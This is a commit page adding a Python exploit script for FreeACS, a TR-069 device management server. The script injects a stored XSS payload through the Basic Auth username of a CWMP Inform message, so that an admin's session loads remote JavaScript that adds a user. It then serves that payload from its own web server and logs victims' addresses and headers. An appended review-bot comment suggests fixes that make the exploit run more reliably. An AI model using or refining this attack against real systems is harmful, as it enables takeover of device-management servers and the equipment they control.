
Commit 3e97da5

author
David Davidson
authored
Create freeacs-pwn.py
1 parent 4622ac7 commit 3e97da5


1 file changed

+79
-0
lines changed


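--- /dev/null
+++ b/FreeACS-Pwn/freeacs-pwn.py
@@ -0,0 +1,79 @@
+#!/usr/bin/python
+# worlds cheapest exploit - made by copypasting from stackoverflow.
+# released at BSides Edinburgh.
+# Exploits freeacs - freeacs.com
+# TL;DR:
+# - Persistent XSS via CWMP Notify message
+# - XSS fires in admin session and adds a user
+# HACK THE PLANET!
+# Darren Martyn - @info_dox - 7th March 2017
+from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
+import requests
+
+class myHandler(BaseHTTPRequestHandler):
+def do_GET(self):
+print "{+} Got call from %s - you probably pwned one ;)" %(self.client_address[0])
+print "{+} Dumping headers for extra info...\n%s" %(self.headers)
+f = open("poc.js", "rb")
+poc = f.read()
+f.close()
+self.send_response(200)
+self.send_header('Content-type','application/javascript')
+self.end_headers()
+self.wfile.write(poc)
+return
+
+
+def runserver(port):
+try:
+server = HTTPServer(('', port), myHandler)
+print 'Started httpserver on port ' , port
+server.serve_forever()
+
+except KeyboardInterrupt:
+print '^C received, shutting down the web server'
+server.socket.close()
+
+print "{+} First we fire our XSS payload to the target device."
+from requests.auth import HTTPBasicAuth
+url = "http://192.168.1.7:8080/tr069/"
+print "{+} Target is: %s" %(url)
+xml = """\
+<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema/instance/" xmlns:xsd="http://www.w3.org/2001/XMLSchema/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
+<soap:Body>
+<cwmp:Inform>
+<DeviceId xsi:type="cwmp:DeviceIdStruct">
+<Manufacturer xsi:type="xsd:string[64]">Serafeim</Manufacturer>
+<OUI xsi:type="xsd:string[6]">123456</OUI>
+<ProductClass xsi:type="xsd:string[64]">Testing</ProductClass>
+<SerialNumber xsi:type="xsd:string[64]">12312131</SerialNumber>
+</DeviceId>
+<Event soap:arrayType="cwmp:EventStruct[1]">
+<EventCode xsi:type="xsd:string[64]">6 CONNECTION REQUEST</EventCode>
+</Event>
+<MaxEnvelopes xsi:type="xsd:unsignedInt">10</MaxEnvelopes>
+<CurrentTime xsi:type="xsd:dateTime">2017-03-05T16:29:48</CurrentTime>
+<RetryCount xsi:type="xsd:unsignedInt">0</RetryCount>
+<ParameterList soap:arrayType="cwmp:ParameterValueStruct[2]">
+<ParameterValueStruct>
+<Name xsi:type="xsd:string">InternetGatewayDevice.ManagementServer.URL</Name>
+<Value xsi:type="xsd:string">https://127.0.0.1:80</Value>
+</ParameterValueStruct>
+<ParameterValueStruct>
+<Name xsi:type="xsd:string">InternetGatewayDevice.ManagementServer.ConnectionRequestURL</Name>
+<Value xsi:type="xsd:string">http://127.0.0.1:24582/CONNECT</Value>
+</ParameterValueStruct>
+</ParameterList>
+</cwmp:Inform>
+</soap:Body>
+</soap:Envelope>"""
+headers = {'SOAPAction': ''}
+#auth=HTTPBasicAuth('"/><script>alert("xss ;)")</script>', 'pass')
+auth=HTTPBasicAuth('"/><script src="//kitten/x.js"></script>', 'pass') # XXX: CHANGE THIS URL
+r = requests.post(url=url, data=xml, headers=headers, auth=auth)
+print r.headers
+print r.status_code
+print r.text
+##
+print "{+} Now we launch our XSS serving server ;)"
+runserver(port=80)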
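Review bot: In runserver the `except KeyboardInterrupt` branch reads `server`, which is still unbound if the interrupt lands before `HTTPServer(('', port), myHandler)` returns, so the cleanup path itself raises UnboundLocalError; a `socket.error` from a failed bind is not caught at all and exits with a bare traceback. Construct the server above the `try:` and guard only `server.serve_forever()`, so the except branch always has a bound `server` to close. In do_GET the file is read without a context manager, so an IOError on `poc.js` leaks the handle and surfaces only as a traceback in the server log; `with open("poc.js", "rb") as f: poc = f.read()` keeps the handle scoped. The header comment on line 6 says the XSS rides a CWMP Notify message, while the body built from line 41 is a `cwmp:Inform`; the comment should say Inform so a reader matching it against server logs is not misled.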
